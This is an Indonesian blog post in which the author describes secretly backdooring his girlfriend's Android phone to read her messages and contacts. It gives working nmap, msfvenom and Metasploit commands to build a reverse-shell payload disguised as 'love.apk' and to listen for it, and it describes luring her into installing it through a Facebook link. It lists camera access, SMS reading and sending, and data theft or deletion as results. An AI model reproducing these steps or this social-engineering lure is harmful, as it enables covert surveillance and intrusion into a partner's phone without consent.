nyatanya itu benar tapi setelah di pikir lagi sudah banyak aplikasi atau script di luar sana
yang memudahkan kita melakukan hacking
Postingan ini saya buat karna kebetulan kemarin saya main di kostnya pacar saya
trus kebetulan juga saya bawa leptop yang menggunakan OS kernel linux mint 17.3 yang sudah dengan susah payah di konfigurasi metasploit , set dan armitage dan sekian banyak tools hacking lain.
Kronologi dan Logika
awalnya saya tidak bermaksut melakukan ini ke pacarsaya tapi rasa penasaran apa yang ada di dalam
hpnya mulai dari kontak sms dll membuat saya mencoba hal ini.
disini saya membutuhkan backdoor untuk android pacar saya , kebetulan ketika saya
berhasil masuk dan mengecek sysinfo versi android adalah 5.1 atau lolipop
Yang di butuhkan
metasploit
backdoor yang di buat oleh msfvenom
nmap
Langkah-langkah
mengetahui ip yang ada di android pacar saya bilang dia aja ya
NMAP
# sudo nmap -sn 192.168.43.168/24
fungsi (-sn) adalah membatasi cek dengan melakukan ping dan melewatkan port scan
lalu isikan ip kita dan /24 unutk jarak scan ingat /24 saja , dan hasilnya
[sudo] password for rio:
Starting Nmap 6.40 ( http://nmap.org ) at 2016-04-13 14:13 WITA
Nmap scan report for 192.168.43.1
Host is up (0.0025s latency).
MAC Address: 12:FA:CE:39:CF:3D (Unknown)
Nmap scan report for daxXxter (192.168.43.168)
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 4.03 seconds
disini di ketahui ip dia 192.168.43.1 dan ip saya 192.168.43.168
karna saya tidak menggunakan kali linux maka sayang menggunakan perintah sudo untuk mengeksekusi msfvenom sebagai super user
MEMBUAT BACKDOOR
# sudo msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.168 lport=4444 > /home/rio/love.apk
nama backdoor di buat menarik
awalnya saya buat clean background.apk tapi saya rubah jadi love.apk
lhost nya isikan ip kamu lport isikan 4444 aja karna di saya port 80 kebetulan udah di pake
bisa port terserah
EXPLOIT
# sudo msfconsole
# use exploit/multi/handler
# set payload android/meterpreter/reverse_tcp
# set lhost 192.168.43.168
# set lport 4444
gunakan # show options jika ingin melihat mengkap
kemudian jalankan perintah
# exploit
disini saya menunggu bagaimana cara agar dia menginstall backdoor tersebut
SOCIAL ENGINEERING
nah agar backdoor sampai ke dia saya memanfaatkan trick seperti biasa dengan
mengirimkan link di internet yang tertuju di download link backdoor tersebut
seperti biasa saya menggunakan https://www.sendspace.com
yang sangat mudah penggunaannya hanya drak dan drop dan akan muncul links donwlaod, disini agar langsung otomatis terdownload ketika di klick dia, awalnya saya download sendiri dlu lalu copy linknya di menu "all download" di chromium browser saya.
selanjutnya saya inbox ke dia di facebook dengan harapan dia baca
dan benar saja dia klick link tersebut dan menginstall backdoor tersebut,
mungkin karna nama backdoornya love.apk jadi dia penasaran.
ketika di buka sesi meterpreter aktif dan tampilannya seperti ini
disini kita bisa akses kamera depan dan blakang
kirim sms dari hp dia
baca sms
baca kontak
hapus data download data dia dll
sekian silahkan bertanya jika kurang paham
maaf kalo kurang lengkap dengan gambar karna awalnya saya nga kepikir mo posting
No comments:
Post a Comment